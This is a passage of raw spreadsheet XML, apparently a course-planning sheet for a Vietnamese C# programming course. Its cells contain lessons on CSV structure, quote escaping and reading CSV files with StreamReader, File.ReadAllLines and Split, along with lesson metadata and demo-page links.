Dấu phân cách là một trong những yếu tố quan trọng nhất định nghĩa cấu trúc của một file CSV. Nó là ký tự đặc biệt được sử dụng để phân tách các trường dữ liệu trong một dòng. Mặc dù tên "CSV" ngụ ý sử dụng dấu phẩy (Comma), trên thực tế, nhiều ký tự khác cũng có thể được dùng làm dấu phân cách. Điều quan trọng nhất là dấu phân cách phải được sử dụng nhất quán trong toàn bộ file và người đọc file phải biết được dấu phân cách đã dùng là gì.
Các loại dấu phân cách phổ biến bao gồm:
Dấu phẩy (,): Đây là dấu phân cách phổ biến nhất và là nguồn gốc của tên "CSV".
Sản phẩm A,100000,50
Sản phẩm B,250000,20
Dấu chấm phẩy (;): Thường được sử dụng ở các quốc gia hoặc hệ thống có dấu phẩy được dùng làm dấu thập phân trong số, để tránh nhầm lẫn.
Sản phẩm C;300.500;10
Sản phẩm D;120.000;30
Ký tự tab (\t): Khi sử dụng ký tự tab làm dấu phân cách, file thường được gọi là TSV (Tab Separated Values).
Tên	Tuổi	Thành phố
Mai	28	Đà Nẵng
Minh	35	Hải Phòng
Khi làm việc với file CSV, việc xác định đúng dấu phân cách là bước đầu tiên và thiết yếu. Nếu không, dữ liệu sẽ không thể được phân tích cú pháp (parse) một cách chính xác.
Dòng tiêu đề (Header Row): Định danh dữ liệu của bạn
Dòng tiêu đề, hay còn gọi là header row, là một dòng đặc biệt thường xuất hiện ở đầu file CSV. Mục đích chính của nó là cung cấp tên cho mỗi cột (trường) dữ liệu. Mặc dù không phải mọi file CSV đều có dòng tiêu đề, nhưng việc có nó mang lại nhiều lợi ích đáng kể:
Dễ đọc và dễ hiểu: Dòng tiêu đề giúp con người nhanh chóng nhận biết ý nghĩa của từng cột dữ liệu mà không cần phải đoán hay tham khảo tài liệu bên ngoài.
Xử lý dữ liệu dễ dàng hơn: Đối với các chương trình phần mềm, dòng tiêu đề cung cấp các nhãn rõ ràng để truy cập dữ liệu theo tên thay vì theo chỉ số. Điều này làm cho code trở nên dễ đọc, dễ bảo trì và ít bị lỗi hơn khi cấu trúc cột thay đổi.
Tự mô tả: Một file CSV có dòng tiêu đề tự mô tả được dữ liệu nó chứa, giảm thiểu sự mơ hồ.
Thông thường, dòng tiêu đề sẽ tuân theo cùng một quy tắc phân tách trường như các dòng dữ liệu khác.
Ví dụ có dòng tiêu đề:
Mã sản phẩm,Tên sản phẩm,Giá,Số lượng tồn kho
SP001,Bàn phím cơ,1500000,100
SP002,Chuột gaming,500000,250
Trong ví dụ này, Mã sản phẩm, Tên sản phẩm, Giá, Số lượng tồn kho là các tiêu đề giúp chúng ta hiểu rõ ý nghĩa của từng trường dữ liệu trong các dòng tiếp theo. Khi lập trình, bạn có thể truy cập giá trị "Bàn phím cơ" bằng cách tham chiếu đến cột "Tên sản phẩm" thay vì "cột thứ hai".
Xử lý các trường hợp đặc biệt: Dấu nháy kép (Double Quotes)
Mặc dù CSV là định dạng đơn giản, nhưng có những trường hợp dữ liệu thực tế có thể gây ra xung đột với các quy tắc phân tách trường. Để giải quyết vấn đề này, chuẩn CSV định nghĩa việc sử dụng dấu nháy kép (") để bao quanh các trường dữ liệu.
Có hai tình huống chính cần sử dụng dấu nháy kép:
1. Khi một trường chứa dấu phân cách
Nếu một trường dữ liệu chứa chính ký tự được sử dụng làm dấu phân cách (ví dụ: dấu phẩy trong file CSV), việc không bao quanh trường đó bằng dấu nháy kép sẽ khiến trình đọc CSV hiểu nhầm và phân tách trường đó thành nhiều trường nhỏ hơn.
Ví dụ:
Bạn muốn lưu địa chỉ "123 Đường Nguyễn Huệ, Quận 1, TP.HCM". Nếu không dùng dấu nháy kép:
Nguyễn Văn A,123 Đường Nguyễn Huệ, Quận 1, TP.HCM,0901234567
Trình đọc CSV sẽ thấy 5 trường thay vì 3 (Tên, Địa chỉ, SĐT). Để khắc phục:
Nguyễn Văn A,"123 Đường Nguyễn Huệ, Quận 1, TP.HCM",0901234567
Bằng cách này, toàn bộ chuỗi "123 Đường Nguyễn Huệ, Quận 1, TP.HCM" được coi là một trường duy nhất.
2. Khi một trường chứa chính dấu nháy kép
Nếu bản thân dữ liệu trong một trường đã chứa ký tự dấu nháy kép ("), và trường đó cũng cần được bao quanh bởi dấu nháy kép (ví dụ, vì nó cũng chứa dấu phân cách), thì ký tự dấu nháy kép bên trong dữ liệu cần được thoát (escape) bằng cách lặp lại chính nó. Tức là, một dấu nháy kép bên trong một trường được bao quanh sẽ trở thành hai dấu nháy kép liên tiếp ("").
Ví dụ:
Bạn có một mô tả sản phẩm là: Sản phẩm này có tên là "Super X". và bạn muốn lưu nó vào một trường.
Nếu chỉ bao quanh bằng dấu nháy kép:
"Sản phẩm này có tên là "Super X"."
Trình đọc CSV sẽ bị lỗi vì nó sẽ hiểu dấu nháy kép thứ hai (trước "Super X") là dấu kết thúc của trường. Để xử lý, bạn phải viết:
"Sản phẩm này có tên là ""Super X""."
Khi trình đọc CSV xử lý trường này, nó sẽ hiểu "" là một ký tự " duy nhất bên trong dữ liệu.
Một ví dụ tổng hợp:
Tên sản phẩm,Mô tả,Giá
"Bánh ""Mỹ vị"", loại đặc biệt","Bánh ngọt, hương vị truyền thống, được nhiều người yêu thích.",50000
Trong ví dụ trên:
Trường "Bánh ""Mỹ vị"", loại đặc biệt": Chứa cả dấu phẩy (,) và dấu nháy kép ("). Dấu phẩy yêu cầu toàn bộ trường được bao quanh bởi dấu nháy kép. Dấu nháy kép bên trong ("Mỹ vị") được thoát bằng cách lặp lại (""Mỹ vị"").
Trường "Bánh ngọt, hương vị truyền thống, được nhiều người yêu thích.": Chứa dấu phẩy, nên được bao quanh bởi dấu nháy kép.
Hiểu rõ các quy tắc về dấu nháy kép là rất quan trọng để đảm bảo rằng dữ liệu CSV của bạn có thể được đọc và ghi một cách chính xác, đặc biệt khi làm việc với dữ liệu phức tạp trong các ứng dụng C#.</t>
        </is>
      </c>
      <c r="W46" s="22" t="inlineStr">
        <is>
          <t># Cấu trúc cơ bản của File CSV
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Gọi đúng tên các thành phần của tệp CSV: hàng tiêu đề, bản ghi, trường, dấu phân cách, ký tự xuống dòng.
- Nhận ra trường rỗng qua hai dấu phẩy liền nhau.
- Kể tên các dấu phân cách thường gặp: dấu phẩy, dấu chấm phẩy, dấu tab.
- Giải thích khi nào một trường cần được bao bằng dấu nháy kép và cách thoát dấu nháy kép.
- Quan sát từng thành phần được tô sáng trong tệp mẫu bằng hoạt động mô phỏng.
## Các thành phần của một tệp CSV
Hãy nhìn một tệp CSV nhỏ `sp.csv`. Dòng cuối cố ý thiếu tên sản phẩm:
```
Ma,Ten,Gia
SP01,Bút bi,5000
SP02,Vở,12000
SP03,Thước,8000
SP04,,3000
```
Tệp này được ghép từ năm thành phần.
### Hàng tiêu đề (header row)
Dòng đầu tiên `Ma,Ten,Gia` ghi **tên các cột**. Nó không phải là dữ liệu sản phẩm. Không phải tệp CSV nào cũng có hàng tiêu đề, nhưng có nó thì:
- Người đọc hiểu ngay từng cột là gì.
- Chương trình có thể gọi cột theo tên thay vì theo số thứ tự.
- Tệp tự mô tả, bớt mơ hồ.
### Bản ghi (record)
Mỗi dòng dữ liệu là một **bản ghi**, tương ứng với một đối tượng như một sản phẩm, một khách hàng, một giao dịch. Ví dụ `SP01,Bút bi,5000` là bản ghi của sản phẩm Bút bi.
### Trường (field)
Mỗi giá trị trong một bản ghi là một **trường**, tương ứng một ô của bảng. Ở bản ghi `SP02,Vở,12000`, các trường là `SP02`, `Vở` và `12000`.
### Dấu phân cách (delimiter)
**Dấu phân cách** là ký tự ngăn cách các trường trong cùng một dòng. Mặc định là dấu phẩy. Điều quan trọng là dùng **nhất quán** trong cả tệp và người đọc phải biết đó là dấu nào.
| Dấu phân cách | Ví dụ | Ghi chú |
|---|---|---|
| Dấu phẩy `,` | `SP01,Bút bi,5000` | Phổ biến nhất |
| Dấu chấm phẩy `;` | `SP01;Bút bi;5000` | Hay gặp ở vùng dùng dấu phẩy làm dấu thập phân |
| Dấu tab | `SP01&lt;tab&gt;Bút bi&lt;tab&gt;5000` | Thường gọi là TSV |
Trong mô phỏng, bạn sẽ thấy một số vùng (như Việt Nam) cho phần mềm bảng tính xuất CSV với dấu chấm phẩy thay vì dấu phẩy.
### Ký tự xuống dòng
Mỗi bản ghi kết thúc bằng **ký tự xuống dòng** (`\n` hoặc `\r\n`, tùy hệ điều hành). Chính nó cho biết bản ghi nào bắt đầu và kết thúc ở đâu.
## Trường rỗng
Nếu một giá trị bị bỏ trống, ta vẫn giữ nguyên các dấu phẩy. Dòng `SP04,,3000` có **hai dấu phẩy liền nhau**, nghĩa là trường ở giữa (tên) rỗng. Vẫn có đủ ba trường: `SP04`, chuỗi rỗng và `3000`. Nếu bỏ mất một dấu phẩy, các cột sau sẽ lệch chỗ.
## Dấu nháy kép trong trường
Chuyện gì xảy ra nếu dữ liệu chứa chính dấu phân cách? Chẳng hạn địa chỉ `123 Nguyễn Huệ, Quận 1`. Chuẩn CSV giải quyết bằng **dấu nháy kép** (`"`).
**Trường chứa dấu phân cách:** bao cả trường trong dấu nháy kép, trình đọc sẽ coi đó là một trường duy nhất.
```
Nguyễn Văn A,"123 Nguyễn Huệ, Quận 1",0901234567
```
Dòng này có đúng 3 trường. Nếu không có dấu nháy kép, trình đọc sẽ thấy 4 trường.
**Trường chứa dấu nháy kép:** bao cả trường trong dấu nháy kép và **viết đôi** dấu nháy kép bên trong (`""`).
```
"Sản phẩm này có tên là ""Super X""."
```
Khi đọc, `""` được hiểu là một ký tự `"` trong dữ liệu. Chi tiết cách xử lý bằng code sẽ học ở các bài sau.
## Hoạt động: Gọi tên từng thành phần
Mô phỏng dưới đây hiện tệp `sp.csv` và gắn nhãn từng thành phần. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để xem từng nhãn:
- Mở tab **Các thành phần**. Ở bước "Hàng tiêu đề", dòng đầu `Ma,Ten,Gia` sáng lên, kèm nhãn "Hàng tiêu đề: tên các cột".
- Bước "Bản ghi": dòng `SP01,Bút bi,5000` sáng lên, nhãn "Bản ghi: một dòng, một sản phẩm".
- Bước "Trường": chỉ giá trị `Vở` ở dòng `SP02,Vở,12000` sáng lên, nhãn "Trường: một giá trị".
- Bước "Dấu phân cách": các dấu phẩy ở dòng 1 sáng lên, nhãn "Dấu phân cách: dấu phẩy".
- Bước "Trường rỗng": ở dòng `SP04,,3000`, hai dấu phẩy và vị trí giữa chúng chuyển đỏ, nhãn "Trường rỗng: thiếu tên".
- Bước "Xuống dòng": ký tự ↵ cuối mỗi dòng hiện ra, nhãn "Xuống dòng: kết thúc một bản ghi". Bước cuối so sánh `SP01,Bút bi,5000` (dấu phẩy) với `SP01;Bút bi;5000` (dấu chấm phẩy ở một số vùng).
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/gioi-thieu-ve-csv-va-cau-truc-co-ban/cau-truc-co-ban-cua-file-csv/" title="Cấu trúc cơ bản của tệp CSV" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: một tệp CSV được dựng từ hàng tiêu đề, bản ghi, trường, dấu phân cách và ký tự xuống dòng. Gọi đúng tên các phần này giúp bạn đọc tài liệu và viết code xử lý CSV dễ hơn. Hãy xác định đúng dấu phân cách trước khi đọc tệp.
## Tóm tắt
- **Hàng tiêu đề** ghi tên cột. **Bản ghi** là một dòng dữ liệu. **Trường** là một giá trị trong bản ghi.
- **Dấu phân cách** ngăn các trường: thường là `,`, đôi khi là `;` hoặc tab.
- **Ký tự xuống dòng** kết thúc mỗi bản ghi.
- **Trường rỗng** biểu diễn bằng hai dấu phân cách liền nhau, ví dụ `SP04,,3000`.
- Trường chứa dấu phân cách thì bao trong `"..."`. Dấu `"` bên trong được viết đôi thành `""`.</t>
        </is>
      </c>
    </row>
    <row r="47" ht="409.6" customHeight="1" s="18">
      <c r="A47" s="10" t="n">
        <v>47</v>
      </c>
      <c r="B47" s="10" t="inlineStr">
        <is>
          <t>5. Làm việc với Dữ liệu có Cấu trúc (CSV)</t>
        </is>
      </c>
      <c r="C47" s="10" t="inlineStr">
        <is>
          <t>Đọc dữ liệu từ File CSV</t>
        </is>
      </c>
      <c r="D47" s="10" t="inlineStr">
        <is>
          <t>Các bước cơ bản để đọc File CSV trong C#</t>
        </is>
      </c>
      <c r="E47" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F47" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G47" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H47" s="10" t="inlineStr">
        <is>
          <t>Thấy các bước biến một dòng văn bản thành một đối tượng trong List.</t>
        </is>
      </c>
      <c r="I47" s="10" t="inlineStr">
        <is>
          <t>1 cột</t>
        </is>
      </c>
      <c r="J47" s="10" t="inlineStr">
        <is>
          <t>Dây chuyền ngang: Dòng văn bản → Split(',') → mảng 3 ô → chuyển kiểu (int.Parse giá) → thẻ đối tượng Product → thả vào List&lt;Product&gt;. Mỗi dòng lần lượt đi qua các trạm.</t>
        </is>
      </c>
      <c r="K47" s="10" t="inlineStr">
        <is>
          <t>H17, H12, H01</t>
        </is>
      </c>
      <c r="L47" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M47" s="10" t="inlineStr">
        <is>
          <t>File.ReadAllLines("sp.csv") → mảng 4 dòng.
Bỏ dòng tiêu đề (bắt đầu từ i = 1).
Dòng 1: Split(',') → ["SP01", "Bút bi", "5000"].
int.Parse("5000") → 5000; tạo new Product("SP01", "Bút bi", 5000); Add vào List.
Lặp lại cho dòng 2 và 3.
Xong: List có 3 Product.</t>
        </is>
      </c>
      <c r="N47" s="10" t="inlineStr">
        <is>
          <t>sp.csv như bài 'CSV là gì'</t>
        </is>
      </c>
      <c r="O47" s="10" t="inlineStr">
        <is>
          <t>Đọc CSV = đọc dòng → tách trường → chuyển kiểu → tạo đối tượng.</t>
        </is>
      </c>
      <c r="P47" s="10" t="n"/>
      <c r="Q47" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/doc-du-lieu-tu-file-csv/cac-buoc-co-ban-de-doc-file-csv-trong-c-sharp/index.html</t>
        </is>
      </c>
      <c r="R47" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/doc-du-lieu-tu-file-csv/cac-buoc-co-ban-de-doc-file-csv-trong-c-sharp/</t>
        </is>
      </c>
      <c r="S47" s="10" t="n"/>
      <c r="T47" s="12" t="n"/>
      <c r="U47" s="12" t="n"/>
      <c r="V47" s="21" t="inlineStr">
        <is>
          <t>Mở File CSV với StreamReader
Để đọc nội dung từ một file CSV (hoặc bất kỳ file văn bản nào khác) trong C#, chúng ta thường sử dụng lớp StreamReader. Lớp này cung cấp một cách hiệu quả để đọc dữ liệu ký tự từ một stream, cho phép bạn xử lý file theo từng dòng hoặc từng khối ký tự.
StreamReader được thiết kế để làm việc với các file văn bản và tự động xử lý việc mã hóa ký tự (encoding), giúp bạn dễ dàng đọc các loại file khác nhau mà không cần lo lắng về chi tiết kỹ thuật của encoding.
Khi làm việc với các tài nguyên hệ thống như file, điều quan trọng là phải đảm bảo rằng các tài nguyên này được giải phóng đúng cách sau khi sử dụng, ngay cả khi có lỗi xảy ra. Trong C#, cách tốt nhất để làm điều này là sử dụng khối lệnh using. Khối using sẽ tự động gọi phương thức Dispose() của đối tượng khi khối lệnh kết thúc, đảm bảo rằng file được đóng và các tài nguyên hệ thống được giải phóng.
Dưới đây là cách bạn có thể khởi tạo một StreamReader để mở một file CSV:
string filePath = "du_lieu_mau.csv"; // Đường dẫn tới file CSV của bạn
try
{
    using (StreamReader reader = new StreamReader(filePath))
    {
        // Tại đây, bạn có thể bắt đầu đọc nội dung file
        Console.WriteLine($"Đã mở file '{filePath}' thành công.");
        // ... các thao tác đọc sẽ được thực hiện ở đây
    } // Khi thoát khỏi khối 'using', StreamReader sẽ tự động đóng file
}
catch (FileNotFoundException)
{
    Console.Error.WriteLine($"Lỗi: Không tìm thấy file tại đường dẫn '{filePath}'.");
}
catch (Exception ex)
{
    Console.Error.WriteLine($"Đã xảy ra lỗi khi mở hoặc đọc file: {ex.Message}");
}
Trong ví dụ trên, chúng ta đã:
Khai báo đường dẫn đến file CSV.
Sử dụng khối using để tạo một thể hiện của StreamReader. Điều này đảm bảo rằng file sẽ được đóng tự động ngay cả khi có ngoại lệ (exception) xảy ra.
Thêm khối try-catch để xử lý các lỗi có thể phát sinh, chẳng hạn như file không tồn tại (FileNotFoundException).
Đọc Từng Dòng Dữ liệu với ReadLine()
Sau khi đã mở file thành công bằng StreamReader, bước tiếp theo là đọc nội dung của nó. Phương thức cơ bản nhất để đọc dữ liệu từ StreamReader theo từng dòng là ReadLine().
Phương thức ReadLine() thực hiện các công việc sau:
Đọc tất cả các ký tự từ vị trí hiện tại của con trỏ đọc cho đến khi gặp ký tự xuống dòng (\n hoặc \r\n).
Trả về chuỗi chứa nội dung của dòng vừa đọc (không bao gồm ký tự xuống dòng).
Di chuyển con trỏ đọc đến đầu dòng tiếp theo.
Nếu không còn dòng nào để đọc (tức là đã đến cuối file), ReadLine() sẽ trả về null.
Đây là một ví dụ đơn giản về cách sử dụng ReadLine():
using System;
using System.IO;
public class BasicCsvReader
{
    public static void Main(string[] args)
    {
        string filePath = "du_lieu_mau.csv";
        // Giả sử có một file du_lieu_mau.csv với nội dung như sau:
        // Tên,Tuổi,Thành phố
        // Alice,30,Hà Nội
        // Bob,24,Đà Nẵng
        try
        {
            using (StreamReader reader = new StreamReader(filePath))
            {
                string firstLine = reader.ReadLine(); // Đọc dòng đầu tiên
                Console.WriteLine($"Dòng đầu tiên: {firstLine}");
                string secondLine = reader.ReadLine(); // Đọc dòng thứ hai
                Console.WriteLine($"Dòng thứ hai: {secondLine}");
                string thirdLine = reader.ReadLine(); // Đọc dòng thứ ba
                Console.WriteLine($"Dòng thứ ba: {thirdLine}");
                string endOfFile = reader.ReadLine(); // Đọc dòng tiếp theo (sẽ là null vì hết file)
                Console.WriteLine($"Dòng tiếp theo (hết file): {(endOfFile == null ? "NULL" : endOfFile)}");
            }
        }
        catch (FileNotFoundException)
        {
            Console.Error.WriteLine($"Lỗi: Không tìm thấy file '{filePath}'. Hãy đảm bảo file tồn tại.");
        }
        catch (Exception ex)
        {
            Console.Error.WriteLine($"Đã xảy ra lỗi: {ex.Message}");
        }
    }
}
Nếu bạn chạy đoạn code trên với một file du_lieu_mau.csv có nội dung như đã chú thích, bạn sẽ thấy output hiển thị từng dòng dữ liệu và cuối cùng là "NULL" khi không còn gì để đọc.
Duyệt Toàn Bộ File CSV
Để đọc toàn bộ nội dung của một file CSV, chúng ta cần kết hợp phương thức ReadLine() với một vòng lặp. Vì ReadLine() trả về null khi không còn dòng nào để đọc, chúng ta có thể sử dụng điều kiện này để kiểm soát vòng lặp. Vòng lặp while là lựa chọn lý tưởng cho kịch bản này.
Cách tiếp cận phổ biến là đọc một dòng vào một biến chuỗi, sau đó kiểm tra xem chuỗi đó có phải là null hay không. Nếu không phải null, chúng ta xử lý dòng đó và tiếp tục đọc dòng tiếp theo trong lần lặp kế tiếp.
using System;
using System.IO;
public class FullCsvReader
{
    public static void Main(string[] args)
    {
        string filePath = "du_lieu_mau.csv";
        // Đảm bảo file du_lieu_mau.csv tồn tại với nội dung mẫu:
        // Tên,Tuổi,Thành phố
        // Alice,30,Hà Nội
        // Bob,24,Đà Nẵng
        // Charlie,28,Hồ Chí Minh
        try
        {
            using (StreamReader reader = new StreamReader(filePath))
            {
                string line;
                int lineNumber = 0;
                // Vòng lặp sẽ tiếp tục cho đến khi ReadLine() trả về null (hết file)
                while ((line = reader.ReadLine()) != null)
                {
                    lineNumber++;
                    Console.WriteLine($"Dòng {lineNumber}: {line}");
                    // Tại đây, bạn sẽ xử lý chuỗi 'line' để phân tích các trường dữ liệu.
                    // Ví dụ: tách chuỗi bằng dấu phẩy, nhưng chúng ta sẽ đi sâu hơn vào việc đó trong các bài học sau.
                }
                Console.WriteLine("Đã đọc hết file.");
            }
        }
        catch (FileNotFoundException)
        {
            Console.Error.WriteLine($"Lỗi: Không tìm thấy file '{filePath}'. Vui lòng kiểm tra lại đường dẫn.");
        }
        catch (Exception ex)
        {
            Console.Error.WriteLine($"Đã xảy ra lỗi khi đọc file: {ex.Message}");
        }
    }
}
Trong đoạn mã trên:
Chúng ta khởi tạo một biến line kiểu string để lưu trữ nội dung của mỗi dòng.
Vòng lặp while có một điều kiện đặc biệt: (line = reader.ReadLine()) != null. Điều này thực hiện hai việc cùng một lúc:
Gọi reader.ReadLine() để đọc dòng tiếp theo từ file và gán giá trị trả về vào biến line.
Kiểm tra xem giá trị của line có phải là null hay không. Nếu không phải null, vòng lặp tiếp tục; nếu là null (đã hết file), vòng lặp kết thúc.
Bên trong vòng lặp, chúng ta có thể in ra hoặc xử lý chuỗi line đã đọc. Đối với các file CSV cơ bản, bạn có thể nghĩ đến việc sử dụng line.Split(',') để tách các trường dữ liệu. Tuy nhiên, việc xử lý các trường dữ liệu có chứa dấu phân cách hoặc dấu nháy kép cần các kỹ thuật phức tạp hơn, mà chúng ta sẽ tìm hiểu chi tiết trong bài học "Xử lý các trường có dấu nháy kép và dấu phân cách đặc biệt".
Chuẩn bị File CSV Mẫu
Để chạy các ví dụ trên, bạn cần có một file CSV mẫu trong cùng thư mục với chương trình C# của mình (hoặc cung cấp đường dẫn đầy đủ đến file). Bạn có thể tạo file này bằng cách sử dụng bất kỳ trình soạn thảo văn bản nào (như Notepad, VS Code) và lưu nó với tên du_lieu_mau.csv.
Nội dung của du_lieu_mau.csv:
Tên,Tuổi,Thành phố
Alice,30,Hà Nội
Bob,24,Đà Nẵng
Charlie,28,Hồ Chí Minh
David,22,Cần Thơ
Khi bạn chạy chương trình, nó sẽ đọc và in ra từng dòng của file này.
Tóm tắt
Trong trang này, bạn đã học được các bước cơ bản để đọc một file CSV trong C#:
Sử dụng lớp StreamReader để mở và quản lý luồng đọc file văn bản một cách an toàn thông qua khối lệnh using.
Sử dụng phương thức ReadLine() của StreamReader để đọc từng dòng nội dung của file.
Áp dụng vòng lặp while để duyệt qua toàn bộ file, đọc từng dòng cho đến khi hết dữ liệu.
Đây là nền tảng vững chắc cho việc xử lý dữ liệu CSV. Trong các bài học tiếp theo, chúng ta sẽ xây dựng dựa trên kiến thức này để phân tích các dòng dữ liệu thành từng trường, xử lý các trường hợp phức tạp hơn như dấu nháy kép và dấu phân cách đặc biệt, và chuyển đổi dữ liệu thành các đối tượng C# có cấu trúc.</t>
        </is>
      </c>
      <c r="W47" s="22" t="inlineStr">
        <is>
          <t># Các bước cơ bản để đọc File CSV trong C#
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Liệt kê các bước đọc tệp CSV: đọc dòng, bỏ hàng tiêu đề, tách trường, chuyển kiểu, tạo đối tượng.
- Dùng `File.ReadAllLines` để đọc tệp thành mảng các dòng.
- Dùng `Split(',')` và `int.Parse` để biến một dòng thành các giá trị có kiểu.
- Viết vòng lặp tạo đối tượng `Product` và thêm vào `List&lt;Product&gt;`.
- Quan sát một dòng văn bản đi qua từng "trạm" để thành đối tượng bằng hoạt động mô phỏng.
## Tổng quan các bước
Một tệp CSV chỉ là văn bản. Để dùng được trong chương trình, ta biến mỗi dòng dữ liệu thành một **đối tượng**. Quy trình gồm bốn việc:
1. **Đọc dòng:** lấy các dòng văn bản của tệp.
2. **Tách trường:** cắt mỗi dòng tại dấu phẩy.
3. **Chuyển kiểu:** đổi chuỗi sang kiểu thích hợp (ví dụ chuỗi `"5000"` thành số `5000`).
4. **Tạo đối tượng:** dựng đối tượng rồi thêm vào `List`.
Bài này dùng tệp `sp.csv`:
```
Ma,Ten,Gia
SP01,Bút bi,5000
SP02,Vở,12000
SP03,Thước,8000
```
và lớp `Product` đơn giản:
```csharp
public class Product
{
    public string Ma { get; }
    public string Ten { get; }
    public int Gia { get; }
    public Product(string ma, string ten, int gia)
    {
        Ma = ma;
        Ten = ten;
        Gia = gia;
    }
}
```
## Bước 1: đọc các dòng bằng File.ReadAllLines
`File.ReadAllLines(path)` đọc cả tệp và trả về **mảng chuỗi**, mỗi phần tử là một dòng (không kèm ký tự xuống dòng). Với `sp.csv`, mảng `lines` có 4 phần tử: `lines[0]` là hàng tiêu đề, `lines[1]` đến `lines[3]` là ba bản ghi.
```csharp
var lines = File.ReadAllLines("sp.csv");
Console.WriteLine(lines.Length);   // 4
```
## Bước 2: bỏ hàng tiêu đề
Dòng 0 là tên cột, không phải sản phẩm. Vì vậy vòng lặp bắt đầu từ `i = 1`:
```csharp
for (int i = 1; i &lt; lines.Length; i++)
{
    // xử lý lines[i]
}
```
## Bước 3: tách trường bằng Split
`Split(',')` cắt chuỗi tại mỗi dấu phẩy và trả về mảng. Dòng `"SP01,Bút bi,5000"` thành mảng 3 ô: `"SP01"`, `"Bút bi"`, `"5000"`.
```csharp
var f = lines[i].Split(',');   // f[0] = "SP01", f[1] = "Bút bi", f[2] = "5000"
```
## Bước 4: chuyển kiểu bằng int.Parse
Mọi trường tách ra đều là `string`. Cột `Gia` cần là số nguyên, nên dùng `int.Parse`:
```csharp
int gia = int.Parse(f[2]);   // "5000" thành 5000
```
Nếu chuỗi không phải số, `int.Parse` ném `FormatException`. Ở bài sau, bạn sẽ học cách kiểm tra an toàn hơn.
## Bước 5: tạo đối tượng và thêm vào List
Mỗi dòng cuối cùng thành một `Product` và được thêm vào `List&lt;Product&gt;`:
```csharp
list.Add(new Product(f[0], f[1], gia));
```
## Chương trình hoàn chỉnh
```csharp
using System;
using System.Collections.Generic;
using System.IO;
public class Program
{
    public static void Main()
    {
        var lines = File.ReadAllLines("sp.csv");   // 4 dòng, gồm cả tiêu đề
        var list = new List&lt;Product&gt;();
        for (int i = 1; i &lt; lines.Length; i++)     // bỏ dòng 0 (tiêu đề)
        {
            var f = lines[i].Split(',');
            int gia = int.Parse(f[2]);
            list.Add(new Product(f[0], f[1], gia));
        }
        Console.WriteLine(list.Count);   // 3
        foreach (var p in list)
        {
            Console.WriteLine($"{p.Ma} {p.Ten} {p.Gia}");
        }
        // SP01 Bút bi 5000
        // SP02 Vở 12000
        // SP03 Thước 8000
    }
}
```
Tệp `sp.csv` cần nằm trong thư mục làm việc của chương trình (thường là cùng thư mục với tệp chạy), hoặc bạn truyền đường dẫn đầy đủ.
## Hoạt động: Từ dòng văn bản đến đối tượng
Mô phỏng dưới đây cho một dòng văn bản đi qua các "trạm": Dòng văn bản, `Split(',')`, `int.Parse`, `new Product`, `List`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Đọc CSV**. Bước đầu, `File.ReadAllLines` đọc cả tệp thành mảng 4 dòng và `lines.Length` là 4. Rồi vòng lặp bắt đầu từ `i = 1` nên dòng tiêu đề bị làm mờ, bỏ qua.
- Với dòng 1 `SP01,Bút bi,5000`: `Split(',')` cắt thành mảng `f` gồm 3 ô. `int.Parse` đổi `f[2]` là chuỗi "5000" thành số 5000 (biến `gia`). Sau đó tạo `Product("SP01", "Bút bi", 5000)` và `Add`, danh sách `List&lt;Product&gt; (Count = 1)` hiện ô mới màu xanh.
- Dòng 2 `SP02,Vở,12000` và dòng 3 `SP03,Thước,8000` đi qua đủ các trạm y hệt, `Count` tăng lên 2 rồi 3. Khi `i = 4` không còn nhỏ hơn `lines.Length`, vòng lặp dừng.
- Bước cuối: `List` có 3 `Product`, một cho mỗi dòng dữ liệu.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/doc-du-lieu-tu-file-csv/cac-buoc-co-ban-de-doc-file-csv-trong-c-sharp/" title="Các bước đọc tệp CSV" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: đọc CSV là đọc dòng, tách trường, chuyển kiểu, rồi tạo đối tượng. Cứ lặp lại các bước đó cho từng dòng dữ liệu là có được `List` các đối tượng.
## Cách khác: đọc từng dòng bằng StreamReader
`File.ReadAllLines` nạp cả tệp vào bộ nhớ, rất tiện cho tệp nhỏ và vừa. Với tệp rất lớn, hãy đọc từng dòng bằng `StreamReader` trong khối `using` (tự đóng tệp khi xong). Phương thức `ReadLine()` trả về `null` khi hết tệp:
```csharp
using (var reader = new StreamReader("sp.csv"))
{
    string line;
    while ((line = reader.ReadLine()) != null)
    {
        Console.WriteLine(line);
    }
}
```
## Lưu ý
- `Split(',')` chỉ đúng với dữ liệu đơn giản. Nếu một trường chứa dấu phẩy hoặc dấu nháy kép (như `"123 Nguyễn Huệ, Quận 1"`), `Split` sẽ cắt sai. Các bài sau sẽ xử lý trường hợp này.
- Nếu tệp không có, `ReadAllLines` ném `FileNotFoundException`. Hãy xử lý như ở các bài trước.
## Tóm tắt
- Đọc CSV là biến từng dòng văn bản thành một đối tượng.
- `File.ReadAllLines` đọc tệp thành mảng dòng. Dòng 0 thường là tiêu đề nên vòng lặp bắt đầu từ `i = 1`.
- `Split(',')` tách dòng thành các trường kiểu `string`.
- `int.Parse` (hoặc kiểu tương ứng) chuyển chuỗi sang số.
- `new Product(...)` rồi `list.Add(...)` đưa đối tượng vào `List&lt;Product&gt;`.
- Với tệp rất lớn, dùng `StreamReader` và `ReadLine()` để đọc từng dòng.</t>
        </is>
      </c>
    </row>
    <row r="48" ht="409.6" customHeight="1" s="18">
      <c r="A48" s="10" t="n">
        <v>48</v>
